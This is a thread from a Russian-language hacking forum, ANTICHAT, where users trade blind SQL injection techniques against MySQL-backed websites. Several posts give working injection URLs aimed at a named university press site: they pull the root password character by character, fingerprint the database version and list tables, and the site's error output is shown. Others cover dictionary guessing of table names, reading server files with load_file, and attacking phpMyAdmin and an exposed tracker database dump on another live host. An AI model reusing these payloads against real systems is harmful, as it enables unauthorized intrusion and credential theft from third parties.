ANTICHAT — форум по информационной безопасности, OSINT и технологиям

хз пробуй подзапросы

пример http://mqup.mcgill.ca/book.php?bookid=1%20AND%20ascii(lower(substring((S ELECT%20password%20from%20mysql.user%20WHERE%20use r=%22root%22%20LIMIT%201),1,1)))%3E48


Error executing the SQL Query : SELECT * FROM books WHERE ID = 1 AND ascii(lower(substring((SELECT password from mysql.user WHERE user="root" LIMIT 1),1,1)))>48
Error : 1142 SELECT command denied to user 'mqup'@'localhost' for table 'user'

xcedz
Спасибо за совет с подзапросами

таким способом узнал
что версия скулы 5
http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring(version(),1, 1))='5'

что есть таблица authors
http://mqup.mcgill.ca/book.php?bookid=1+AND+lower(substring((select+tabl e_name+from+information_schema.tables+limit+17,1), 1,1))='a'
....

итд

Все понял буду знать!

Hi,
what do you do, if you get a SQL Injection, and the version() is < 5.0 ?
If < 5.0 there isn't any Information_Schema. Do you just guess the right table/column names?
Load_File is a possibility too, but it doesn't work each time.

Thank you

There's no another way to check if a table with current name exists.
For instance u can write a script which will check them one by one from a dictionary as the chance of some tables' with default names existance is rather high.

Lidloses_Auge
If I'm not mistaken there is no other way to get some information. You can use lists of table names it'll be like a b-forse)))
look here for table base
http://forum.antichat.ru/nextnewesttothread49622.html

Кароче.Возможно повторп,но прошу не пинать.
Есть 2 вопроса:
1)Как можно ломануть phpmyadmin;
2)Есть трекер.Движко TBDev.Там,на трекере есть папка с файлом дампа Базы Данных.ЕЕ надо удалять после устаовки.Но ее не удалили. помоему там есть права на запись,хотя могу ошбатсо.НУ чем ето может помочь?И вообще кто-нибудь знает как ломать ети двиги?

-----пример-----
http://deniska.ath.cx/ - только помоему рабаотает после 14.00

I'm just searching for more possibilities of using an injection like:

load_file
benchmark
ascii(lowerstring(substring ....
information_schema
into dumpfile

you know more interesting ways?

Подскажите мне пожалуйста вот когда я использую load_file() я могу сделать так - load_file('/index.php')? и если я так сделаю то я увижу исходник страницы?

И как вообще узнать что эта функция работает? только если то что я в ней указал вылезит на экран так?

увидишь, только если в корне есть файл index.php (он там нафиг не нужен)
В качестве аргумента в эту функцию надо передавать реальный путь, а не относительный (можно конечно и относительный, но толку в этом немного, так как тогда нужно будет указывать путь относительно каталога файлов mysql сервера)

узнать есть ли файловые привилегии у пользователя можно например так:
но это только если есть доступ к mysql.user

если нет то только с помошью анализа результата функции, все неудобство в том, что если файла не существует или есть ограничения на чтение файла (например права доступа) то функция возвращает null а не выплевывает ошибки

__________________
Карфаген должен быть разрушен...